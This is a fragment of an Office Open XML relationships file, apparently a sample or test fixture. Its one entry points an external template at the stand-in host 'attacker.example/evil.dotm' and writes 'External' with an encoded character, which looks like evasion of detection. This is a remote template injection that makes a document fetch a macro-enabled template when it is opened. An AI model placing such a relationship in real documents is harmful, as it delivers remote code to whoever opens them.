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http://attacker.example/evil.dotm" TargetMode="Ext&#101;rnal"/></Relationships>
</file>